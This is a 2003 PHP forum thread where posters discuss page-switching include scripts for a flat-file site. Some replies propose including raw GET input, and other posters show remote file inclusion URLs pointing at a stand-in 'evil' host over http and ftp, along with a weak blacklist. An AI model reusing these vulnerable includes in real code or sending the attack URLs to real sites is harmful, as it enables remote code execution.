Page 1 of 2

Extending a single page management script

Posted: Mon Dec 15, 2003 8:16 pm
by Mobius Man
I've created a script (well, two different ones). The first one is for my index.php page, which is a simple include switch that keeps it to a single page design:

Code: Select all

<?php

ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GET['page']) {
    case 'articles':
        include('articles.php');
        break;
    case 'contact':
        include('contact.php');
        break;
    case 'spotlight':
        include('spotlight.php');
        break;
    case 'fan':
        include('fan.php');
        break;
    case 'multimedia':
        include('multimedia.php');
        break;
    case 'links':
        include('links.php');
        break;
    case null:
        include('./news/news.txt');
        break;
    default:
        include('error.php');
        break;
}


?>

That works fine. Secondly, I have a script that when I want to create pages for these pages (i.e. index -> articles -> page), it makes links on the selected page (articles.php for example). This is ok as well. The problem is, how can I include these links on the page as I do with the index.php and those branch files.

Basically I want the index ->articles.php ->page linked from articles.php to all be a single-page deal.

Posted: Mon Dec 15, 2003 8:35 pm
by McGruff
First, dynamic includes might be a better option than a switch / case - can be much quicker with many cases. You'd need to prefix file names for security if you are opening files based on values passed via GET:

Code: Select all

<?php

include('prefix_' . $_GET['page']);

?>
With the null & default cases:

Code: Select all

<?php

function loadPage()
{
    if(is_null($_GET['page']))
    {
        // include .. etc
        return;
    }
    if(!is_file('prefix_' . $_GET['page']))
    {
        // include .. etc
        return;
    }
    include('prefix_' . $_GET['page']);
}
?>
This requires strict file naming conventions, of course.

I couldn't quite understand your query: are you making a front controller? Some recent discussion on this here viewtopic.php?t=15107

Posted: Mon Dec 15, 2003 8:44 pm
by Mobius Man
Basically I'm trying to make a basic mangaer using flat files (I have no access to SQL). :(

This is the file that makes the links, and writes the information to the pages:

Code: Select all

<?php
include ("news/config.php");
$id = $_POST["id"];
$filename = $_POST["id"];
$date = date("F j, Y");
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$content = $_POST["content"];
$pass = $_POST["password"];

if ($password == $pass)
{

$dir = "/" ;
opendir($dir);

$filename2 = 'articles.php';


$file = file_get_contents($filename2);
$fp = fopen($filename2, "w");
fwrite($fp, "<a href=articles/$id>$title</a> - $date <br /><br />");
fwrite($fp, $file);
fclose($fp);

closedir($dir);

chdir("articles");

$file = file_get_contents($filename);
$fp = fopen($filename, "w");
fwrite($fp, "<h1>$title</h1> Posted by: <a href=mailto:$email>$name</a>  $date <br /><br /><br /><br /> $content</font> <br />");
fwrite($fp, $file);

fclose($fp);








?>
<html>
<head>
<title> Page Editor</title>
</head>
<body bgcolor="#6B859C">
<?php echo "<font face=$font size=$fontsize>";
      echo "<center><h2>SUCCESS!!</h2></center>";
      echo "<center>Your news has been successfully posted.<br />";
      echo "Go To: <a href=$websiteurl>$websitename</a> | <a href=page_create.php>Make Another Post</a></center></font>";


?>
</body>
</html>
<?php }
 else {
 echo "Wrong Password <a href=news.php>Try again</a>.";
}
?>

Posted: Tue Dec 16, 2003 3:07 pm
by basdog22
instead of:

Code: Select all

<?php 

ini_set('include_path', 'http://mobius_man.t35.com'); 
switch ($_GET&#1111;'page']) &#123; 
    case 'articles': 
        include('articles.php'); 
        break; 
    case 'contact': 
        include('contact.php'); 
        break; 
    case 'spotlight': 
        include('spotlight.php'); 
        break; 
    case 'fan': 
        include('fan.php'); 
        break; 
    case 'multimedia': 
        include('multimedia.php'); 
        break; 
    case 'links': 
        include('links.php'); 
        break; 
    case null: 
        include('./news/news.txt'); 
        break; 
    default: 
        include('error.php'); 
        break; 
&#125; 


?>
Do this:

Code: Select all

$file=$_GET&#1111;'page']
include "$file.php";
easier and safer.... I hope :roll:

Posted: Tue Dec 16, 2003 6:04 pm
by DuFF
basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory. Example:

http://mobius_man.t35.com/index.php?page=path/to/secret.php

Mobius Man, could you please explain what your problem is in more detail? I don't understand what you are having problems with.

Posted: Tue Dec 16, 2003 6:24 pm
by qads
you want to edit the files with php? :?

Posted: Wed Dec 17, 2003 12:42 am
by vigge89
you can use something like this:

Code: Select all

<?php

//Include content
if (isset($_GET['id'])) {
	$id = "".addslashes($_GET['id']).".php";
	if (file_exists($id)) {
		include ($id); //Include chosen page
	}
	else {
		include ("404.php"); //If the file requested does not exist
	}
}
else {
	include ("start.php"); //Default page
}


?>

Posted: Wed Dec 17, 2003 2:54 pm
by basdog22
Anyone could just use the URL query to bring up any PHP file in the directory
this can be handled with: sessions, referer trick etc :wink:

Posted: Wed Dec 17, 2003 5:24 pm
by Weirdan
DuFF wrote:
basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory.
Even more, it could be used to include the script from remote host:

Code: Select all

http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
It will include(and execute) the script from http://evil.weirdan's.host.com/path/to/secret.php.

Posted: Thu Dec 18, 2003 12:38 am
by basdog22
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?

Posted: Thu Dec 18, 2003 2:34 am
by m3mn0n
lol There is nothing wrong with what he uses, I use the exact same thing. And on most servers I've tested the different page switchers, the difference in script execution is not even a hundredth of a second; so no biggie. And I prefer to define what pages are able to be called instead of allowing anything within a directory, based on the file name. Maybe he does too.

Regarding your article manager, what is wrong with what you're trying to do? And how can we help?

Posted: Thu Dec 18, 2003 3:14 pm
by Weirdan
basdog22 wrote:
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?
it will. But then I'll change the url to:

Code: Select all

http://mobius_man.t35.com/index.php?page=ftp://evil.weirdan's.host.com/path/to/secret
;)
use [php_man]basename[/php_man] function to get rid of traversals and xss attacks.

Posted: Thu Dec 18, 2003 3:38 pm
by Mobius Man
Wow! There's been a lot of posts since I was last on.

Basically, my problem is this. I want to include pages branching from a page off of index.php

For example:

index.php -> articles.php --- this works fine. However...


index.php -> articles.php -> a linked pages from articles.php ---

instead of being included on the same pages as articles.php, it goes directly to the file. I want everything to stay as it would in index.php.

Posted: Fri Dec 19, 2003 8:07 am
by m3mn0n
?p=articles which requires articles.php; and within articles.php, you require an article be called from the GET method also. So the URL would be something like ?p=articles&id=2925.

Posted: Fri Dec 19, 2003 2:46 pm
by basdog22
weirdan :wink: :wink:

Thanks :D basename rules 8)


i will use it for another script i am working on. you can really play with this one :wink: